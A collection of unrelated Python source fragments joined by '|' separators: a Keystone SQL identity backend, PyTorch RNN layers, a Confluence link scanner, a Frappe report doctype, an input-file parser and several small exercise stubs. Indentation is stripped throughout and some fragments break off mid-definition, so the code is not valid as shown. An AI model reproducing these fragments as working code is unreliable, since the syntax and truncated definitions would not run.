# loop.run_in_executor(executor, get_url, "http://www.imooc.com")
tasks = []
for i in range(2, 20):
url = "http://shop.projectsedu.com/goods/{}/".format(i)
# loop.run_in_executor(executor, func_name, func_args)返回的是 task 对象
task = loop.run_in_executor(executor, get_url, url)
tasks.append(task)
loop.run_until_complete(asyncio.wait(tasks))
print("last time :{}".format(time.time()-start_time))
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import functools
from keystone import clean
from keystone.common import sql
from keystone.common.sql import migration
from keystone.common import utils
from keystone import exception
from keystone import identity
def _filter_user(user_ref):
if user_ref:
user_ref.pop('password', None)
return user_ref
def _ensure_hashed_password(user_ref):
pw = user_ref.get('password', None)
if pw is not None:
user_ref['password'] = utils.hash_password(pw)
return user_ref
def handle_conflicts(type='object'):
"""Converts IntegrityError into HTTP 409 Conflict."""
def decorator(method):
@functools.wraps(method)
def wrapper(*args, **kwargs):
try:
return method(*args, **kwargs)
except sql.IntegrityError as e:
raise exception.Conflict(type=type, details=e.message)
return wrapper
return decorator
class User(sql.ModelBase, sql.DictBase):
__tablename__ = 'user'
id = sql.Column(sql.String(64), primary_key=True)
name = sql.Column(sql.String(64), unique=True, nullable=False)
#password = sql.Column(sql.String(64))
extra = sql.Column(sql.JsonBlob())
@classmethod
def from_dict(cls, user_dict):
# shove any non-indexed properties into extra
extra = {}
for k, v in user_dict.copy().iteritems():
# TODO(termie): infer this somehow
if k not in ['id', 'name', 'extra']:
extra[k] = user_dict.pop(k)
user_dict['extra'] = extra
return cls(**user_dict)
def to_dict(self):
extra_copy = self.extra.copy()
extra_copy['id'] = self.id
extra_copy['name'] = self.name
return extra_copy
class Tenant(sql.ModelBase, sql.DictBase):
__tablename__ = 'tenant'
id = sql.Column(sql.String(64), primary_key=True)
name = sql.Column(sql.String(64), unique=True, nullable=False)
extra = sql.Column(sql.JsonBlob())
@classmethod
def from_dict(cls, tenant_dict):
# shove any non-indexed properties into extra
extra = {}
for k, v in tenant_dict.copy().iteritems():
# TODO(termie): infer this somehow
if k not in ['id', 'name', 'extra']:
extra[k] = tenant_dict.pop(k)
tenant_dict['extra'] = extra
return cls(**tenant_dict)
def to_dict(self):
extra_copy = copy.deepcopy(self.extra)
extra_copy['id'] = self.id
extra_copy['name'] = self.name
return extra_copy
class Role(sql.ModelBase, sql.DictBase):
__tablename__ = 'role'
id = sql.Column(sql.String(64), primary_key=True)
name = sql.Column(sql.String(64), unique=True, nullable=False)
class Metadata(sql.ModelBase, sql.DictBase):
__tablename__ = 'metadata'
#__table_args__ = (
# sql.Index('idx_metadata_usertenant', 'user', 'tenant'),
# )
user_id = sql.Column(sql.String(64), primary_key=True)
tenant_id = sql.Column(sql.String(64), primary_key=True)
data = sql.Column(sql.JsonBlob())
class UserTenantMembership(sql.ModelBase, sql.DictBase):
"""Tenant membership join table."""
__tablename__ = 'user_tenant_membership'
user_id = sql.Column(sql.String(64),
sql.ForeignKey('user.id'),
primary_key=True)
tenant_id = sql.Column(sql.String(64),
sql.ForeignKey('tenant.id'),
primary_key=True)
class Identity(sql.Base, identity.Driver):
# Internal interface to manage the database
def db_sync(self):
migration.db_sync()
def _check_password(self, password, user_ref):
"""Check the specified password against the data store.
This is modeled on ldap/core.py. The idea is to make it easier to
subclass Identity so that you can still use it to store all the data,
but use some other means to check the password.
Note that we'll pass in the entire user_ref in case the subclass
needs things like user_ref.get('name')
For further justification, please see the follow up suggestion at
https://blueprints.launchpad.net/keystone/+spec/sql-identiy-pam
"""
return utils.check_password(password, user_ref.get('password'))
# Identity interface
def authenticate(self, user_id=None, tenant_id=None, password=None):
"""Authenticate based on a user, tenant and password.
Expects the user object to have a password field and the tenant to be
in the list of tenants on the user.
"""
user_ref = None
tenant_ref = None
metadata_ref = {}
try:
user_ref = self._get_user(user_id)
except exception.UserNotFound:
raise AssertionError('Invalid user / password')
if not utils.check_password(password, user_ref.get('password')):
raise AssertionError('Invalid user / password')
if tenant_id is not None:
if tenant_id not in self.get_tenants_for_user(user_id):
raise AssertionError('Invalid tenant')
try:
tenant_ref = self.get_tenant(tenant_id)
metadata_ref = self.get_metadata(user_id, tenant_id)
except exception.TenantNotFound:
tenant_ref = None
metadata_ref = {}
except exception.MetadataNotFound:
metadata_ref = {}
return (_filter_user(user_ref), tenant_ref, metadata_ref)
def get_tenant(self, tenant_id):
session = self.get_session()
tenant_ref = session.query(Tenant).filter_by(id=tenant_id).first()
if tenant_ref is None:
raise exception.TenantNotFound(tenant_id=tenant_id)
return tenant_ref.to_dict()
def get_tenant_by_name(self, tenant_name):
session = self.get_session()
tenant_ref = session.query(Tenant).filter_by(name=tenant_name).first()
if not tenant_ref:
raise exception.TenantNotFound(tenant_id=tenant_name)
return tenant_ref.to_dict()
def get_tenant_users(self, tenant_id):
session = self.get_session()
self.get_tenant(tenant_id)
user_refs = session.query(User)\
.join(UserTenantMembership)\
.filter(UserTenantMembership.tenant_id ==
tenant_id)\
.all()
return [_filter_user(user_ref.to_dict()) for user_ref in user_refs]
def _get_user(self, user_id):
session = self.get_session()
user_ref = session.query(User).filter_by(id=user_id).first()
if not user_ref:
raise exception.UserNotFound(user_id=user_id)
return user_ref.to_dict()
def _get_user_by_name(self, user_name):
session = self.get_session()
user_ref = session.query(User).filter_by(name=user_name).first()
if not user_ref:
raise exception.UserNotFound(user_id=user_name)
return user_ref.to_dict()
def get_user(self, user_id):
return _filter_user(self._get_user(user_id))
def get_user_by_name(self, user_name):
return _filter_user(self._get_user_by_name(user_name))
def get_metadata(self, user_id, tenant_id):
session = self.get_session()
metadata_ref = session.query(Metadata)\
.filter_by(user_id=user_id)\
.filter_by(tenant_id=tenant_id)\
.first()
if metadata_ref is None:
raise exception.MetadataNotFound()
return metadata_ref.data
def get_role(self, role_id):
session = self.get_session()
role_ref = session.query(Role).filter_by(id=role_id).first()
if role_ref is None:
raise exception.RoleNotFound(role_id=role_id)
return role_ref
def list_users(self):
session = self.get_session()
user_refs = session.query(User)
return [_filter_user(x.to_dict()) for x in user_refs]
def list_roles(self):
session = self.get_session()
role_refs = session.query(Role)
return list(role_refs)
# These should probably be part of the high-level API
def add_user_to_tenant(self, tenant_id, user_id):
session = self.get_session()
self.get_tenant(tenant_id)
self.get_user(user_id)
q = session.query(UserTenantMembership)\
.filter_by(user_id=user_id)\
.filter_by(tenant_id=tenant_id)
rv = q.first()
if rv:
return
with session.begin():
session.add(UserTenantMembership(user_id=user_id,
tenant_id=tenant_id))
session.flush()
def remove_user_from_tenant(self, tenant_id, user_id):
session = self.get_session()
self.get_tenant(tenant_id)
self.get_user(user_id)
membership_ref = session.query(UserTenantMembership)\
.filter_by(user_id=user_id)\
.filter_by(tenant_id=tenant_id)\
.first()
if membership_ref is None:
raise exception.NotFound('User not found in tenant')
with session.begin():
session.delete(membership_ref)
session.flush()
def get_tenants(self):
session = self.get_session()
tenant_refs = session.query(Tenant).all()
return [tenant_ref.to_dict() for tenant_ref in tenant_refs]
def get_tenants_for_user(self, user_id):
session = self.get_session()
self.get_user(user_id)
membership_refs = session.query(UserTenantMembership)\
.filter_by(user_id=user_id)\
.all()
return [x.tenant_id for x in membership_refs]
def get_roles_for_user_and_tenant(self, user_id, tenant_id):
self.get_user(user_id)
self.get_tenant(tenant_id)
try:
metadata_ref = self.get_metadata(user_id, tenant_id)
except exception.MetadataNotFound:
metadata_ref = {}
return metadata_ref.get('roles', [])
def add_role_to_user_and_tenant(self, user_id, tenant_id, role_id):
self.get_user(user_id)
self.get_tenant(tenant_id)
self.get_role(role_id)
try:
metadata_ref = self.get_metadata(user_id, tenant_id)
is_new = False
except exception.MetadataNotFound:
metadata_ref = {}
is_new = True
roles = set(metadata_ref.get('roles', []))
if role_id in roles:
msg = ('User %s already has role %s in tenant %s'
% (user_id, role_id, tenant_id))
raise exception.Conflict(type='role grant', details=msg)
roles.add(role_id)
metadata_ref['roles'] = list(roles)
if is_new:
self.create_metadata(user_id, tenant_id, metadata_ref)
else:
self.update_metadata(user_id, tenant_id, metadata_ref)
def remove_role_from_user_and_tenant(self, user_id, tenant_id, role_id):
try:
metadata_ref = self.get_metadata(user_id, tenant_id)
is_new = False
except exception.MetadataNotFound:
metadata_ref = {}
is_new = True
roles = set(metadata_ref.get('roles', []))
if role_id not in roles:
msg = 'Cannot remove role that has not been granted, %s' % role_id
raise exception.RoleNotFound(message=msg)
roles.remove(role_id)
metadata_ref['roles'] = list(roles)
if is_new:
self.create_metadata(user_id, tenant_id, metadata_ref)
else:
self.update_metadata(user_id, tenant_id, metadata_ref)
# CRUD
@handle_conflicts(type='user')
def create_user(self, user_id, user):
user['name'] = clean.user_name(user['name'])
user = _ensure_hashed_password(user)
session = self.get_session()
with session.begin():
user_ref = User.from_dict(user)
session.add(user_ref)
session.flush()
return user_ref.to_dict()
@handle_conflicts(type='user')
def update_user(self, user_id, user):
if 'name' in user:
user['name'] = clean.user_name(user['name'])
session = self.get_session()
if 'id' in user and user_id != user['id']:
raise exception.ValidationError('Cannot change user ID')
with session.begin():
user_ref = session.query(User).filter_by(id=user_id).first()
if user_ref is None:
raise exception.UserNotFound(user_id=user_id)
old_user_dict = user_ref.to_dict()
user = _ensure_hashed_password(user)
for k in user:
old_user_dict[k] = user[k]
new_user = User.from_dict(old_user_dict)
user_ref.name = new_user.name
user_ref.extra = new_user.extra
session.flush()
return user_ref
def delete_user(self, user_id):
session = self.get_session()
with session.begin():
session.query(UserTenantMembership)\
.filter_by(user_id=user_id).delete(False)
session.query(Metadata)\
.filter_by(user_id=user_id).delete(False)
if not session.query(User).filter_by(id=user_id).delete(False):
raise exception.UserNotFound(user_id=user_id)
@handle_conflicts(type='tenant')
def create_tenant(self, tenant_id, tenant):
tenant['name'] = clean.tenant_name(tenant['name'])
session = self.get_session()
with session.begin():
tenant_ref = Tenant.from_dict(tenant)
session.add(tenant_ref)
session.flush()
return tenant_ref.to_dict()
@handle_conflicts(type='tenant')
def update_tenant(self, tenant_id, tenant):
if 'name' in tenant:
tenant['name'] = clean.tenant_name(tenant['name'])
session = self.get_session()
with session.begin():
tenant_ref = session.query(Tenant).filter_by(id=tenant_id).first()
if tenant_ref is None:
raise exception.TenantNotFound(tenant_id=tenant_id)
old_tenant_dict = tenant_ref.to_dict()
for k in tenant:
old_tenant_dict[k] = tenant[k]
new_tenant = Tenant.from_dict(old_tenant_dict)
tenant_ref.name = new_tenant.name
tenant_ref.extra = new_tenant.extra
session.flush()
return tenant_ref
def delete_tenant(self, tenant_id):
session = self.get_session()
with session.begin():
session.query(UserTenantMembership)\
.filter_by(tenant_id=tenant_id).delete(False)
session.query(Metadata)\
.filter_by(tenant_id=tenant_id).delete(False)
if not session.query(Tenant).filter_by(id=tenant_id).delete(False):
raise exception.TenantNotFound(tenant_id=tenant_id)
@handle_conflicts(type='metadata')
def create_metadata(self, user_id, tenant_id, metadata):
session = self.get_session()
with session.begin():
session.add(Metadata(user_id=user_id,
tenant_id=tenant_id,
data=metadata))
session.flush()
return metadata
@handle_conflicts(type='metadata')
def update_metadata(self, user_id, tenant_id, metadata):
session = self.get_session()
with session.begin():
metadata_ref = session.query(Metadata)\
.filter_by(user_id=user_id)\
.filter_by(tenant_id=tenant_id)\
.first()
data = metadata_ref.data.copy()
for k in metadata:
data[k] = metadata[k]
metadata_ref.data = data
session.flush()
return metadata_ref
def delete_metadata(self, user_id, tenant_id):
self.db.delete('metadata-%s-%s' % (tenant_id, user_id))
return None
@handle_conflicts(type='role')
def create_role(self, role_id, role):
session = self.get_session()
with session.begin():
session.add(Role(**role))
session.flush()
return role
@handle_conflicts(type='role')
def update_role(self, role_id, role):
session = self.get_session()
with session.begin():
role_ref = session.query(Role).filter_by(id=role_id).first()
if role_ref is None:
raise exception.RoleNotFound(role_id=role_id)
for k in role:
role_ref[k] = role[k]
session.flush()
return role_ref
def delete_role(self, role_id):
session = self.get_session()
with session.begin():
if not session.query(Role).filter_by(id=role_id).delete():
raise exception.RoleNotFound(role_id=role_id)
session.flush()
|
"""Give and take items to/from a character."""
from . import numbers as no
class ItemGiver:
"""The ItemGiver class."""
def give(self, character):
"""Give or take items."""
raise NotImplementedError()
class Add(ItemGiver):
"""Add an item."""
def __init__(self, item, value=no.Constant(1)):
"""Make an ItemGiver to add an item.
Parameters
----------
item : string
An item or variable
value : ave.numbers.Number
The value to add to a variable
"""
self.item = item
self.value = value
def give(self, character):
"""Give or take items."""
character.add(self.item, self.value.get_value(character))
class Remove(ItemGiver):
"""Remove an item."""
def __init__(self, item, value=no.Constant(1)):
"""Make an ItemGiver to take an item.
Parameters
----------
item : string
An item or variable
value : ave.numbers.Number
The value to take from a variable
"""
self.item = item
self.value = value
def give(self, character):
"""Give or take items."""
character.remove(self.item, self.value.get_value(character))
class Set(ItemGiver):
"""Set a variable to a value."""
def __init__(self, item, value):
"""Make an ItemGiver to set a variable to a value.
Parameters
----------
item : string
The variable
value : ave.numbers.Number
The value to set it to
"""
self.item = item
self.value = value
def give(self, character):
"""Give or take items."""
character.set(self.item, self.value.get_value(character))
|
import functools
import importlib
import pathlib
import pkgutil
import re
import click
from . import builders
from .formatter import AssetFormatter
from .writer import AssetWriter
def make_symbol_name(base=None, working_path=None, input_file=None, input_type=None, input_subtype=None, prefix=None):
if base is None:
if input_file is None:
raise NameError("No base name or input file provided.")
if working_path is None:
name = '_'.join(input_file.parts)
else:
name = '_'.join(input_file.relative_to(working_path).parts)
else:
name = base.format(
filename=input_file.with_suffix('').name,
filepath=input_file.with_suffix(''),
fullname=input_file.name,
fullpath=input_file,
type=input_type,
subtype=input_subtype
)
name = name.replace('.', '_')
name = re.sub('[^0-9A-Za-z_]', '_', name)
name = name.lower()
if type(prefix) is str:
name = prefix + name
return name
class AssetBuilder:
_by_name = {}
_by_extension = {}
def __init__(self, typemap):
self.typemap = typemap
def __call__(self, build_func):
self.name = build_func.__name__
self.build = build_func
self._by_name[self.name] = self
for subtype, extensions in self.typemap.items():
for ext, auto in extensions.items():
if auto:
if ext in self._by_extension:
raise KeyError(f'An automatic handler for {ext} has already been registered ({self._by_extension[ext]}).')
self._by_extension[ext] = f'{self.name}/{subtype}'
return self
def __repr__(self):
return self.name
@staticmethod
def build(self, data, subtype, **kwargs):
raise NotImplementedError
def from_file(self, path, subtype, **kwargs):
if subtype is None:
subtype = self.guess_subtype(path)
elif subtype not in self.typemap.keys():
raise ValueError(f'Invalid subtype {subtype}, choices {self.typemap.keys()}')
return self.build(path.read_bytes(), subtype, **kwargs)
def guess_subtype(self, path):
for input_type, extensions in self.typemap.items():
if path.suffix in extensions:
return input_type
raise TypeError(f"Unable to identify type of input file {path.name}.")
@classmethod
def guess_builder(cls, path):
try:
return cls._by_extension[path.suffix]
except KeyError:
raise TypeError('Could not find a builder for {path}.')
class AssetTool:
_commands = {}
def __init__(self, builder, help):
self.builder = builder
self.name = builder.name
self.help = help
def __call__(self, f):
@click.command(self.name, help=self.help)
@click.option('--input_file', type=pathlib.Path, required=True, help='Input file')
@click.option('--input_type', type=click.Choice(self.builder.typemap.keys(), case_sensitive=False), default=None, help='Input file type')
@click.option('--output_file', type=pathlib.Path, default=None, help='Output file')
@click.option('--output_format', type=click.Choice(AssetFormatter.names(), case_sensitive=False), default=None, help='Output file format')
@click.option('--symbol_name', type=str, default=None, help='Output symbol name')
@click.option('--force/--keep', default=False, help='Force file overwriting')
@functools.wraps(f)
def cmd(input_file, input_type, output_file, output_format, symbol_name, force, **kwargs):
aw = AssetWriter()
aw.add_asset(symbol_name, f(input_file, input_type, **kwargs))
aw.write(output_format, output_file, force, report=False)
self._commands[self.name] = cmd
# Load all the implementations dynamically.
for loader, module_name, is_pkg in pkgutil.walk_packages(builders.__path__, builders.__name__ + '.'):
# We don't need to import anything from the modules. We just need to load them.
# This will cause the decorators to run, which registers the builders.
importlib.import_module(module_name, builders.__name__)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class BatchRNN(nn.Module):
"""
RNN layer with BatchNormalization and parameter reset,
convert input: (batch, windows, in_features) into output: (batch, windows, out_features)
optional: bidirectional default set to be True which means using BIRNN
"""
def __init__(self, in_features, out_features, windows=200, rnn_type=nn.LSTM, dropout=0.3, bidirectional=True, batch_norm=True):
super(BatchRNN, self).__init__()
self.out_features = out_features
self.rnn_type = rnn_type
self.bidirectional = bidirectional
self.batch_norm = batch_norm
self.in_features = in_features
self.dropout = dropout
self.rnn = rnn_type(input_size=in_features, hidden_size=out_features,
bidirectional=bidirectional, batch_first=True)
self.dropout = nn.Dropout(p=dropout)
self.BatchNorm1d = nn.BatchNorm1d(windows)
def reset_parameters(self):
for name, param in self.rnn.named_parameters():
if 'weight_ih' in name:
nn.init.kaiming_normal_(param.data)
elif 'weight_hh' in name:
nn.init.xavier_normal_(param.data)
else:
param.data.fill_(0)
def forward(self, x):
self.reset_parameters()
if self.batch_norm:
x = self.BatchNorm1d(x) # (batch_size, windows, features)
x, _ = self.rnn(x)
# x = self.dropout(x)
if self.bidirectional:
# sum two directions which means (B,W,H*2) => (B,W,H)
x = x.view(x.shape[0], x.shape[1], 2, -1).sum(2).view(x.shape[0], x.shape[1], -1)
return x
def fclayer(in_features, out_features):
"""
fully connected layers or dense layer
:param in_features: input_dimension => channels * features
:param out_features: output_dimension
:return: (batch, windows, channels * features) => (*, *, output_dimension)
"""
fc = nn.Linear(in_features, out_features)
nn.init.kaiming_normal_(fc.weight)
return fc
class ShallowCNN(nn.Module):
def __init__(self, ): |
import os
import re
import sys
from atlassian import Confluence
from bs4 import BeautifulSoup
def verify_environment_variables():
return os.getenv("ATLASSIAN_EMAIL") and os.getenv("ATLASSIAN_API_TOKEN")
def trim_html_tags(html):
soup = BeautifulSoup(html, "html.parser")
return soup.get_text()
def extract_anchor_urls(html):
soup = BeautifulSoup(html, "html.parser")
return [link.get("href") for link in soup.find_all("a")]
if __name__ == "__main__":
if not verify_environment_variables():
sys.exit(
"Make sure that the environment variables ATLASSIAN_EMAIL and "
"ATLASSIAN_API_TOKEN are set."
)
confluence = Confluence(
url="https://pyconjp.atlassian.net",
username=os.getenv("ATLASSIAN_EMAIL"),
password=os.getenv("ATLASSIAN_API_TOKEN"),
)
space_content = confluence.get_space_content("pyconjp")
pages = space_content["page"]["results"]
print(f"{len(pages)} pages")
print("-" * 40)
for page in pages:
title = page["title"]
html_body = page["body"]["storage"]["value"]
content = trim_html_tags(html_body)
print(f"{title} ({len(content)} characters)")
urls = extract_anchor_urls(html_body)
for url in urls:
# 共有ドライブへの直リンクと思しきリンクを洗い出す
if re.match(r"https?://(docs|drive).google.com/.*", url):
print(url)
print("-" * 30)
|
"""
parses the input file for keywords
"""
from autoparse.find import first_capture
from autoparse.find import all_captures
from autoparse.pattern import capturing
from autoparse.pattern import zero_or_more
from autoparse.pattern import one_or_more
from autoparse.pattern import escape
from autoparse.pattern import NONSPACE
from autoparse.pattern import SPACE
from autoparse.pattern import WILDCARD
from autoparse.pattern import INTEGER
from autoparse.pattern import LINE_FILL
from autoparse.pattern import NONNEWLINE
from autoparse.pattern import NEWLINE
INPUT_SUPPORTED_SECTIONS = [
'lennard_jones',
'properties',
'baths',
'targets'
]
INPUT_REQUIRED_SECTIONS = [
'lennard_jones',
'baths',
'targets'
]
LJ_SUPPORTED_KEYWORDS = [
'theory_level',
'potential',
'nsamps',
'njobs',
'smin',
'smax',
'run_prefix',
'save_prefix',
'conf'
]
LJ_REQUIRED_KEYWORDS = [
'theory_level',
'potential',
'nsamps',
'njobs',
'run_prefix',
'save_prefix',
]
# Read the targets and baths sections and species
def read_targets(input_string):
""" builds a dictionary containing all needed info for the targets
"""
targets_section = _get_targets_section(input_string)
targets_dct = {}
for line in targets_section.splitlines():
tmp = line.strip().split()
assert len(tmp) >= 4
name, ich, chg, mult = tmp[0], tmp[1], tmp[2], tmp[3]
targets_dct[name] = [ich, int(chg), int(mult)]
assert targets_dct
return targets_dct
def read_baths(input_string):
""" builds a dictionary containing all needed info for the baths
"""
baths_section = _get_baths_section(input_string)
baths_lst = []
for line in baths_section.splitlines():
tmp = line.strip().split()
assert len(tmp) >= 4
ich, chg, mult = tmp[1], tmp[2], tmp[3]
baths_lst = [ich, int(chg), int(mult)]
assert baths_lst
return baths_lst
def _get_targets_section(input_string):
""" grabs the section of text containing all of the targets
"""
pattern = (escape('$targets') + LINE_FILL + NEWLINE +
capturing(one_or_more(WILDCARD, greedy=False)) +
escape('$end'))
section = first_capture(pattern, input_string)
assert section is not None
return section
def _get_baths_section(input_string):
""" grabs the section of text containing all of the baths
"""
pattern = (escape('$baths') + LINE_FILL + NEWLINE +
capturing(one_or_more(WILDCARD, greedy=False)) +
escape('$end'))
section = first_capture(pattern, input_string)
assert section is not None
return section
# Read the keywords from the lennard jones section
def read_potential(input_string):
""" obtain the potential to be used
"""
pattern = ('potential' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(one_or_more(NONSPACE)))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword == 'lj126'
return keyword
def read_nsamps(input_string):
""" obtain the nsamps to be used
"""
pattern = ('nsamps' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(INTEGER))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword is not None
keyword = int(keyword)
return keyword
def read_njobs(input_string):
""" obtain the njobs to be used
"""
pattern = ('njobs' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(INTEGER))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword is not None
keyword = int(keyword)
return keyword
def read_smin(input_string):
""" obtain the smin to be used
"""
pattern = ('smin' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(INTEGER))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
if keyword is None:
keyword = 2
else:
keyword = int(keyword)
return keyword
def read_smax(input_string):
""" obtain the smax to be used
"""
pattern = ('smax' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(INTEGER))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
if keyword is None:
keyword = 6
else:
keyword = int(keyword)
return keyword
def read_conf(input_string):
""" obtain the confs to be used
"""
pattern = ('conf' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(one_or_more(NONSPACE)))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword is not None
return keyword
def read_run_prefix(input_string):
""" obtain the run_prefix to be used
"""
pattern = ('run_prefix' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(one_or_more(NONSPACE)))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword is not None
return keyword
def read_save_prefix(input_string):
""" obtain the save_prefix to be used
"""
pattern = ('save_prefix' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(one_or_more(NONSPACE)))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword is not None
return keyword
def read_theory_level(input_string):
""" obtain the theory level
"""
pattern = ('theory_level' +
zero_or_more(SPACE) + '=' + zero_or_more(SPACE) +
capturing(one_or_more(NONSPACE)))
block = _get_lennard_jones_options_section(input_string)
keyword = first_capture(pattern, block)
assert keyword is not None
return keyword
def _get_lennard_jones_options_section(input_string):
""" grabs the section of text containing all of the job keywords
for lennard jones calculations
"""
pattern = (escape('$lennard_jones') + LINE_FILL + NEWLINE +
capturing(one_or_more(WILDCARD, greedy=False)) +
escape('$end'))
section = first_capture(pattern, input_string)
assert section is not None
return section
# Functions to check for errors in the input file
def check_defined_sections(input_string):
""" verify all defined sections have been defined
"""
pattern = (escape('$') + capturing(one_or_more(NONNEWLINE)))
matches = all_captures(pattern, input_string)
# See if each section has an paired end and is a supported keywords
defined_sections = []
for i, match in enumerate(matches):
if (i+1) % 2 == 0:
if match != 'end':
raise ValueError
else:
defined_sections.append(match)
# Check if sections are supported
if not all(section in INPUT_SUPPORTED_SECTIONS
for section in defined_sections):
raise NotImplementedError
# Check if elements of keywords
if not all(section in defined_sections
for section in INPUT_REQUIRED_SECTIONS):
raise NotImplementedError
def check_defined_lennard_jones_keywords(input_string):
""" obtains the keywords defined in the input by the user
"""
section_string = _get_lennard_jones_options_section(input_string)
defined_keywords = _get_defined_keywords(section_string)
# Check if keywords are supported
if not all(keyword in LJ_SUPPORTED_KEYWORDS
for keyword in defined_keywords):
raise NotImplementedError
# Check if elements of keywords
if not all(keyword in defined_keywords
for keyword in LJ_REQUIRED_KEYWORDS):
raise NotImplementedError
def _get_defined_keywords(section_string):
""" gets a list of all the keywords defined in a section
"""
defined_keys = []
for line in section_string.splitlines():
if '=' in line:
tmp = line.strip().split('=')[0]
defined_keys.append(tmp.strip())
return defined_keys
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import cint
from frappe.model.document import Document
class Report(Document):
def validate(self):
"""only administrator can save standard report"""
if not self.module:
self.module = frappe.db.get_value("DocType", self.ref_doctype, "module")
if not self.is_standard:
self.is_standard = "No"
if frappe.session.user=="Administrator" and getattr(frappe.local.conf, 'developer_mode',0)==1:
self.is_standard = "Yes"
if self.is_standard == "Yes" and frappe.session.user!="Administrator":
frappe.msgprint(_("Only Administrator can save a standard report. Please rename and save."),
raise_exception=True)
if self.report_type in ("Query Report", "Script Report") \
and frappe.session.user!="Administrator":
frappe.msgprint(_("Only Administrator allowed to create Query / Script Reports"),
raise_exception=True)
def on_update(self):
self.export_doc()
def export_doc(self):
from frappe.modules.export_file import export_to_files
if self.is_standard == 'Yes' and (frappe.local.conf.get('developer_mode') or 0) == 1:
export_to_files(record_list=[['Report', self.name]],
record_module=self.module)
@Document.whitelist
def toggle_disable(self, disable):
self.db_set("disabled", cint(disable))
|
import argparse
import numpy as np
from sklearn.preprocessing import normalize
from sklearn.neighbors import NearestNeighbors
from sklearn.metrics.pairwise import cosine_similarity
from transformers import RobertaTokenizer
import logging
from ..models.multnat_model import MultNatModel
def print_nn(pattern: np.array, nbrs: NearestNeighbors,
tokenizer: RobertaTokenizer):
distances, indices = nbrs.kneighbors(X=pattern)
lines = [[] for _ in range(indices.shape[1])]
for dists, neighbors in zip(distances, indices):
for i, (d, n) in enumerate(zip(dists, neighbors)):
sim = 1 - d*d/2
if n < len(tokenizer):
lines[i].append("{:25s} ({:.2f})".format(
tokenizer.convert_ids_to_tokens([n])[0], sim))
else:
lines[i].append("C")
for line in lines:
print("\t".join(line))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('checkpoint')
parser.add_argument('num_patterns', type=int)
parser.add_argument('num_tokens_per_pattern', type=int)
parser.add_argument('--num-nn', default=5, type=int)
args = parser.parse_args()
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.INFO,
datefmt='%Y-%m-%d %H:%M:%S'
)
logger = logging.getLogger(__name__)
logger.info('Loading model')
model = MultNatModel.load_from_checkpoint(args.checkpoint)
logger.info('Done loading model')
logger.info('Converting embeddings to numpy')
emb = model.model.get_input_embeddings()
contokens = emb.weight[-args.num_patterns *
args.num_tokens_per_pattern:].detach().numpy()
patterns = [
normalize(contokens[s:s+args.num_tokens_per_pattern])
for s in range(0, contokens.shape[0],
args.num_tokens_per_pattern)
]
if len(patterns) != args.num_patterns:
print("ERROR: Found {} patterns but expected {}".format(
len(patterns), args.num_patterns))
print("contokens:", contokens.shape)
print("patterns[0]:", patterns[0].shape)
# print(patterns)
exit(1)
logger.info('Constructing ball tree of embeddings')
nbrs = NearestNeighbors(
n_neighbors=args.num_nn, algorithm='ball_tree'
).fit(normalize(emb.weight.detach().numpy()))
logger.info('Start nearest neighbors search')
for pat in patterns:
print_nn(pat, nbrs, model.tokenizer)
print('-----')
similarities = cosine_similarity(contokens)
with np.printoptions(precision=2, suppress=True):
print(similarities)
|
# Implementar los metodos de la capa de datos de socios.
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from practico_05.ejercicio_01 import Base, Socio
class DatosSocio(object):
def __init__(self):
engine = create_engine('sqlite:///socios.db')
Base.metadata.bind = engine
db_session = sessionmaker()
db_session.bind = engine
self.session = db_session()
def buscar(self, id_socio):
"""
Devuelve la instancia del socio, dado su id.
Devuelve None si no encuentra nada.
:rtype: Socio
"""
return
def buscar_dni(self, dni_socio):
"""
Devuelve la instancia del socio, dado su dni.
Devuelve None si no encuentra nada.
:rtype: Socio
"""
return
def todos(self):
"""
Devuelve listado de todos los socios en la base de datos.
:rtype: list
"""
return []
def borrar_todos(self):
"""
Borra todos los socios de la base de datos.
Devuelve True si el borrado fue exitoso.
:rtype: bool
"""
return False
def alta(self, socio):
"""
Devuelve el Socio luego de darlo de alta.
:type socio: Socio
:rtype: Socio
"""
return socio
def baja(self, id_socio):
"""
Borra el socio especificado por el id.
Devuelve True si el borrado fue exitoso.
:rtype: bool
"""
return False
def modificacion(self, socio):
"""
Guarda un socio con sus datos modificados.
Devuelve el Socio modificado.
:type socio: Socio
:rtype: Socio
"""
return socio
def pruebas():
# alta
datos = DatosSocio()
socio = datos.alta(Socio(dni=12345678, nombre='Juan', apellido='Perez'))
assert socio.id > 0
# baja
assert datos.baja(socio.id) == True
# buscar
